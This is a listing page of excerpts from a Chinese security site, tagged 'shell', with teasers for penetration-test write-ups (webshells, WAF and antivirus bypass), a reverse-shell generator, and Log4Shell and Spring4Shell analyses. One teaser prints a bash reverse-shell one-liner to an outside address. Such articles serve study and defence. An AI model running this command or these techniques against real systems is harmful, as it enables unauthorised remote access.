shell - 第 22 | CN-SEC 中文网

安全文章

渗透测试｜记一次bypass拿下主机过程

0x00 前言今天DR发来一个shell，提不上权，而且杀软挺狠，直接就开整，记录下思路。0x01 全文快览不给大佬看废话时间，突破线路如下：webshell–>突破cmd禁用–>重构EX...

04月30日179 views评论

阅读全文

安全工具

具有大量功能的托管反向 Shell 生成器。--（非常适合 CTF）

点击上方蓝字“Ots安全”一起玩耍特征生成通用侦听器和反向 shell原始模式将 shell 卷曲到您的机器。将侦听端口号加 1 的按钮URI 和 Base64 编码LocalStorage 持久化你...

04月28日93 views评论

阅读全文

安全文章

记一次不同思路的getshell经历（渗透攻击链）

转先知社区作者：目标是成为神奇宝贝训练家渗透攻击链：前台sql注入 —— 绕过waf —— 后台文件上传 —— 找到...

04月28日395 views评论

阅读全文

洞见简报【2022/4/27】

2022-04-27 微信公众号精选安全技术文章总览洞见网安 2022-04-270x1 ICMP隧道攻击广软NSDA安全团队 2022-04-27 23:43:39ICMP一般用于检测网络...

04月28日安全新闻155 views评论

阅读全文

安全文章

CodeQL能找到log4shell(CVE-2021-44228)漏洞吗？

0x00 大纲本文将回答下面几个问题： CodeQL能否找到log4shell这个漏洞如何基于log4j-api-2.14.1.jar和log4j-core-2.14.1.jar创建CodeQL ...

04月27日83 views评论

阅读全文

安全闲碎

Hacker基础之Linux篇：基础Linux命令十四

今天我们继续学习Linux命令susu命令用于切换当前用户身份到其他用户身份，变更时须输入所要变更的用户帐号与密码su命令使用介绍：命令格式：su [option] name命令功能：切换当前用户身份...

04月26日79 views评论

阅读全文

安全新闻

研究人员针对 Java 加密漏洞发布 PoC

一个概念验证 (PoC) 代码演示了 Java 中新披露的数字签名绕过漏洞，已在线共享。有问题的高严重性缺陷CVE-2022-21449（CVSS 分数：7.5）影响 Java SE 和 Oracle...

04月25日47 views评论

阅读全文

安全文章

常用反弹shell方法总结

0x01 bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>&1解释：bash -i [interface] 表示启动sh...

04月25日1,124 views评论

阅读全文

安全文章

一次利用哥斯拉马绕过宝塔waf

这次渗透的主站是一个Discuz!3.4 的搭建违法招piao 网站，配置有宝塔WAF用 Discuz!ML 3.X 的漏洞进行攻击，但是没有成功发现主站外链会有一个发卡网，引导人们来这充值，是...

04月25日394 views评论

阅读全文

安全闲碎

对“黑天鹅”网络事件的常见误解

“黑天鹅”事件被认为是无法预测的高影响和低概率事件。无论您是否认为SolarWinds攻击和Log4Shell漏洞属于黑天鹅网络事件，它们都强调了一些关键方法，以帮助组织做好准备并预防危机。误解一：...

04月24日63 views评论

阅读全文

安全文章

Spring4Shell 从漏洞情报到POC构造

0x00 前言相信大家对Spring4Shell (CVE-2022-22965)漏洞已经比较熟悉了，网上也有不少师傅的分析文章，这篇就尝试还原一下从漏洞情报到POC构造的过程。0x01 前期情报3月...

04月24日242 views评论

阅读全文

安全工具

神兵利器—轻量化红队知识仓库

网站导航编码/加密CyberChef：编解码及加密，可本地部署 https://github.com/gchq/CyberChefOK Tools在线工具：https://github.com/wan...

04月24日96 views评论

阅读全文

在线咨询

微信